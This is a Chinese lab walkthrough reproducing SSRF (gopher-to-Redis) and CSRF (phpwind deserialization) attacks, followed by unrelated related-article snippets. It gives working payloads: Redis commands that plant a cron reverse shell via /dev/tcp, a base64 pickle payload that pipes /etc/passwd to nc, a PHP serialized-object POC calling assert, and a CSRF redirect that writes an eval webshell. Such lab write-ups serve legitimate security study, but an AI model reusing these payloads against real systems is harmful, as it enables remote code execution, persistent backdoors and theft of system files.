SSRF和CSRF实战复现

news2024/11/15 12:43:56

文章目录

      • SSRF
        • Web-Hacking-Lab-master
          • 1、Centos未授权访问
          • 2、Ubuntu未授权访问
          • 3、Ubuntu传入公钥访问
          • 4、ssrf_redis_lab_pickle_redis_lab
      • CSRF:windphp

SSRF

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。

file–>读取文件

dict–>探测端口

gopher–>实现入侵

多以gopher+redis+fastcgi结合入侵

gopher+redis :1、上传webshell(必须知道它的物理路径、redis权限要求够高、redis没有密码、安全模式必须关闭)2、写ssh 3、cron写任务计划(在Ubuntu上不成功因为文件创建权限为644,必须为600)4、利用CRLF换行头漏洞,用ssrf把redis的session写入进去,写入过程中会用python进行一个序列化,然后在redis进行读取的时候将session进行反序列化执行我们传入的代码

Web-Hacking-Lab-master
1、Centos未授权访问

1、docker拉取镜像
在这里插入图片描述
2、本地浏览器访问服务器2222端口,进入页面
3、进行端口探测
1)输入dict://127.0.0.1:6379发现服务器6379是开放的
2)使用工具进行时间计划写入反弹shell,生成payload
在这里插入图片描述
3)将payload进行url解码了解原理:

gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$73


*/1 * * * * /bin/bash -c 'sh -i >& /dev/tcp/192.168.68.136/7777 0>&1'


*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
*1
$4
quit

总结:第一步清除redis数据以免影响我们写入数据(实战中不可取),set一个键,输入我们的反弹代码,然后将这个键值在Linux系统里落盘,落盘路径是/var/spool/cron/,文件名root。
4)将工具生成的payload的输入进页面,提交。
5)本机进行监听端口7777。
在这里插入图片描述

2、Ubuntu未授权访问

1、docker拉取镜像
在这里插入图片描述
2、本地浏览器访问服务器1111端口,进入页面
3、进行端口探测
1)输入dict://127.0.0.1:6379发现服务器6379是开放的
2)使用工具进行时间计划写入反弹shell,生成payload
在这里插入图片描述
代码分析:

gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$75


*/1 * * * * /bin/bash -c 'sh -i >& /dev/tcp/192.168.68.136/6666 0>&1'


*4
$6
config
$3
set
$3
dir
$24
/var/spool/cron/crontabs
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
*1
$4
quit

总结:基本与上同,只是落盘路径不一样,Ubuntu落盘文件是/var/spool/cron/crontabs。
3)提交payload,发现失败,无法反弹shell,可能原因有,①落盘路径不可写 ②Ubuntu的计划文件权限必须是600③redis版本没有漏洞(建议靶场使用redis5.0.5版本)
4)Ubuntu时间计划写入反弹shell失败。

3、Ubuntu传入公钥访问

1、拉取环境
2、生成公钥:

ssh-keygen -t rsa

在这里插入图片描述

3、用本机工具生成payload生成公钥
在这里插入图片描述
4、传入payload,结果如下:
在这里插入图片描述
由于redis版本是stable,长期稳固版本,公钥传入失败。
5、我自己在docker环境里传入我的公钥试试,然后ssh远程登录,发现成功。

在这里插入图片描述

4、ssrf_redis_lab_pickle_redis_lab

1、拉取环境,访问反序列化的环境页面,分析app.py文件的代码,发现系统是将session里的cookie进行base64加密序列化,然后使用的时候是将cookie进行反序列化base64解密,我们可以通过对传入的session进行伪造,写入我们的代码进行base64加密并序列化,等系统使用的时候会反序列化执行我们的代码。(flask里会默认将session进行重置,即当你覆盖完原本的session值,在执行完流程后会自动变为原本的session值)
在这里插入图片描述

在这里插入图片描述

2、查看payload原理

http://127.0.0.1:6379/_

*3
$3
set
$44
session:e6d2a82e-cafb-44c1-91ac-3b271a29f24c
$92
Y3Bvc2l4CnN5c3RlbQpwMAooUydjYXQgL2V0Yy9wYXNzd2QgfCBuYyAxMjcuMC4wLjEgOTA5MScKcDEKdHAyClJwMwou

在这里插入图片描述
3、提交payload
在这里插入图片描述
python的httplib自动把%0D%0A过滤了,有些python版本会过滤,有些不会,反正就尝试一下嘛。

CSRF:windphp

- 回调函数 call_user_func_array()
- spl_autoload 、 spl_autoload_register 、 __autoload 三个函数
- 利用数组+命名空间加载相同名字的类
- 利用StdClass代替对象数组
- **将CSRF和反序列化结合,从而使只能在后台触发的序列化漏洞,变为前台getshell。降低漏洞利用条件。**
- CSRF利用技巧

POC:

<?php
namespace src\library\utility {
    class PwDelayRun{

    }
}
namespace{
	class PwDelayRun{
		private $_callback;
		private $_args;
		function __construct()
		{
        $this->_callback = [
			'assert'
        ];
        $this->_args = [
            ["phpinfo();exit;"]
        ];
    }
}

header("Content-Type: text/plain");
$obj = new stdClass();
$obj->a =  new src\library\utility\PwDelayRun();
$obj->b = new PwDelayRun();
echo urlencode(serialize($obj));
}
?>

拿到payload:

http://127.0.0.1/phpwind/admin.php?m=task&c=TaskConditionMember&a=profile&var=O%3A8%3A%22stdClass%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A30%3A%22src%5Clibrary%5Cutility%5CPwDelayRun%22%3A0%3A%7B%7Ds%3A1%3A%22b%22%3BO%3A10%3A%22PwDelayRun%22%3A2%3A%7Bs%3A21%3A%22%00PwDelayRun%00_callback%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22assert%22%3B%7Ds%3A17%3A%22%00PwDelayRun%00_args%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A15%3A%22phpinfo%28%29%3Bexit%3B%22%3B%7D%7D%7D%7D

在这里插入图片描述
1、创建一个php文件,x写入如下代码:

<?php
header("Content-Type: image/gif");
header("Location: http://127.0.0.1/phpwind/admin.php?m=task&c=TaskConditionMember&a=profile&var=O%3A8%3A%22stdClass%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A30%3A%22src%5Clibrary%5Cutility%5CPwDelayRun%22%3A0%3A%7B%7Ds%3A1%3A%22b%22%3BO%3A10%3A%22PwDelayRun%22%3A2%3A%7Bs%3A21%3A%22%00PwDelayRun%00_callback%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22assert%22%3B%7Ds%3A17%3A%22%00PwDelayRun%00_args%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A77%3A%22file_put_contents%28%22.%2Fshell.php%22%2C%27%3C%3Fphp+%40eval%28%24_POST%5Ba%5D%29%3B%3F%3E%27%29%3B+phpinfo%28%29%3Bexit%3B%22%3B%7D%7D%7D%7D");
?>

2、发帖,发图片,选择用代码发,代码如下:

[img]http://127.0.0.1/oupeng.php[/img]

在这里插入图片描述
3、可以看到此时没有shell文件
在这里插入图片描述
4、登录管理员账号
在这里插入图片描述
5、此时出现shell.php文件,反弹shell

在这里插入图片描述
6、测试显示成功
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2071689.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

第三课《排序》

前言 排序是将一组数据&#xff0c;按照指定的顺序或要求来进行排列的过程。是数据结构相关课程和内容较为重要和核心的内容之一&#xff0c;常常作为考试题和面试题目来考察学生和面试者&#xff0c;因此熟练掌握经典的排序算法原理和代码实现是非常重要的 本文介绍了几大较为…

AJAX(5)——Promise

Promise Promise对象用于表示一个异步操作的最终完成或失败及其结果值 语法&#xff1a; //创建Promise对象const p new Promise((resolve, reject) > {//执行异步代码setTimeout(() > {// resolve(成功结果)reject(new Error(失败结果))}, 2000)})//获取结果p.then(r…

坚鹏讲人才第13期:个人数字化转型——个人与时代的共赢之选

坚鹏讲人才第13期&#xff1a;个人数字化转型——个人与时代的共赢之选 在这个日新月异的时代&#xff0c;数字化转型已经成为当今时代的必然趋势&#xff0c;它不仅改变了我们的生活方式&#xff0c;也正在改变着各行各业的运营模式。数字化时代&#xff0c;不仅需要数字化企…

网络udp及ipc内存共享

大字符串找小字符串 调试 1. 信号处理函数注册&#xff1a;•一旦使用 signal 函数注册了信号处理函数&#xff0c;该函数就会一直有效&#xff0c;直到程序结束或者显式地取消注册。2. 注册多次的影响&#xff1a;•如果多次注册同一信号的处理函数&#xff0c;最后一次注册的…

快9月了刚结束基础,武忠祥强化vs张宇18讲应该如何选择?

快9月了&#xff0c;最近有一部分同学刚结束基础&#xff0c;在后台提问&#xff1a;强化到底该学武忠祥还是张宇18讲&#xff1f;其实这个问题&#xff0c;如果你是6月份开始强化&#xff0c;很好回答&#xff0c;但是现在已经快9月份了&#xff0c;很多同学都开始做真题了&am…

代码随想录 刷题记录-16 贪心算法(1)贪心理论基础及习题

一、理论基础 什么是贪心 贪心的本质是选择每一阶段的局部最优&#xff0c;从而达到全局最优。 贪心的套路&#xff08;什么时候用贪心&#xff09; 贪心算法并没有固定的套路。 所以唯一的难点就是如何通过局部最优&#xff0c;推出整体最优。 靠自己手动模拟&#xff0c…

深度学习 回归问题

1. 梯度下降算法 深度学习中, 梯度下降算法是是一种很重要的算法. 梯度下降算法与求极值的方法非常类似, 其核心思想是求解 x ′ x x′, 使得 x ′ x x′ 在取 x ⋆ x^{\star} x⋆ 时, 可以使得 l o s s 函数 loss函数 loss函数 的值最小. 其中, 在求解 x ′ x x′ 的过…

罗德与施瓦茨RS、UPV 音频分析仪 250KHZ 双通道分析仪UPL

罗德与施瓦茨 UPV 音频分析仪的规格包括&#xff1a; 模拟 双通道分析仪&#xff1a;带宽高达 250 kHz 生成正弦波信号&#xff1a;单通道最高 185 kHz&#xff08;需要 B1&#xff09;和双通道最高 80 kHz FFT本底噪声&#xff1a;< -140dB 固有频率响应&#xff08;20 …

链动 2+1 模式小程序 AI 智能名片商城源码培训邀约策略研究

摘要&#xff1a;本文深入剖析链动 21 模式小程序 AI 智能名片商城源码的培训邀约策略&#xff0c;从该源码的价值出发&#xff0c;阐述邀约的重要性&#xff0c;并详细介绍具体的邀约策略&#xff0c;旨在为相关培训活动提供切实可行的指导&#xff0c;提高邀约成功率&#xf…

前端如何快速切换node版本:nvm

安装之前最好卸载计算机已经安装的node&#xff08;通过Windows菜单找到Node.js的卸载程序&#xff0c;运行卸载程序&#xff09;。下载nvm安装包&#xff1a;nvm安装地址。安装nvm&#xff0c;选择nvm安装根路径指定nodejs的安装路径打开命令行&#xff0c;输入nvm -v 可查看版…

Object.create的原型继承

● 首先我们来从这种方法来创建一个和之前一样计算年龄的方法 const PersonProto {cacleAge() {console.log(2038 - birthYear);} };const zhangsan Object.create(PersonProto); console.log(zhangsan);● 发现确实可以实现原型继承的特性 const PersonProto {cacleAge()…

odoo17 group col 属性

odoo17 group col 属性 以前版本&#xff0c;col4,在17中不能用了&#xff0c;或者方法变了 <record id"hetong.addfj_wizard" model"ir.ui.view"><field name"name">合同附件</field><field name"model">het…

免费的大模型插件llm.nvim

llm.nvim&#xff08;https://github.com/StubbornVegeta/llm.nvim&#xff09;是一款基于cloudflare的免费大模型插件&#xff0c;你可以像使用ChatGPT一样和它进行对话 在使用这款插件之前&#xff0c;你需要注册cloudflare&#xff0c;获取你的account和API key。你可以在这…

RCE - - 无字母数字远程命令执行

题目源码 <?php if(isset($_GET[code])){$code $_GET[code];if(strlen($code)>35){die("Long.");}if(preg_match("/[A-Za-z0-9_$]/",$code)){die("NO.");}eval($code); }else{highlight_file(__FILE__); } 分析 这道题 code 接 get 传…

【Qt】常用控件QProgressBar

常用控件QProgressBar 使用QProgressBar表示一个进度条&#xff01;&#xff01;&#xff01; QProgressBar的核心属性 属性说明 minimum 进度条最⼩值 maximum 进度条最⼤值 value 进度条当前值 alignment ⽂本在进度条中的对⻬⽅式. Qt::AlignLeft : 左对⻬Qt::Alig…

AJAX(4)——XMLHttpRequest

XMLHttpRequest 定义&#xff1a;XMLHttpRequest(XHR)对象用于与服务器交互。通过XMLHttpRequest可以在不刷新页面的情况下请求特定URL&#xff0c;获取数据。这允许网页在不影响用于操作的情况下&#xff0c;更新页面的局部内容。XMLHttpRequest在AJAX编程中被大量使用 关系…

第6章 B+树索引

目录 6.1 没有索引的查找 6.1.1 在一个页中的查找 6.1.2 在很多页中查找 6.2 索引 6.2.1 一个简单的索引方案 6.2.2 InnoDB中的索引方案 6.2.2.1 聚簇索引 6.2.2.2 二级索引 6.2.2.3 联合索引 6.2.3 InnoDB的B树索引的注意事项 6.2.3.1 根页面万年不动窝 6.2.3.2 内节…

MYSQL————数据库的约束

1.约束类型 1.not null&#xff1a;指示某列不能存储null值 2.unique&#xff1a;保证某列的每行必须有唯一值 3.default&#xff1a;规定没有给列赋值时的默认值 4.primary key&#xff1a;not null和unique的结合。确保某列&#xff08;或两个或多个列的结合&#xff09;有唯…

qtcreator的vim模式下commit快捷键ctrl+g,ctrl+c没有反应的问题

首先开启vim后&#xff0c;CtrlG&#xff0c;CtrlC无法用 解决&#xff1a; 工具 -> 选项->FakeVim 转到Ex Command Mapping 搜索Commit 底栏Regular expression 输入commit &#xff08;理论上可以是随意的单词&#xff09; 设置好后&#xff0c;以后要运行&#x…

vue+uniapp

#vue支持的语法&#xff0c;基本上可以做uniapp中所使用&#xff08;指绝大部分&#xff09; #知识点&#xff1a;插值表达式&#xff0c;响应式&#xff0c;指令&#xff0c;事件&#xff0c;指令修饰符 #拥有一些案例&#xff0c;补充&#xff0c;以及说明了如何在vscode运…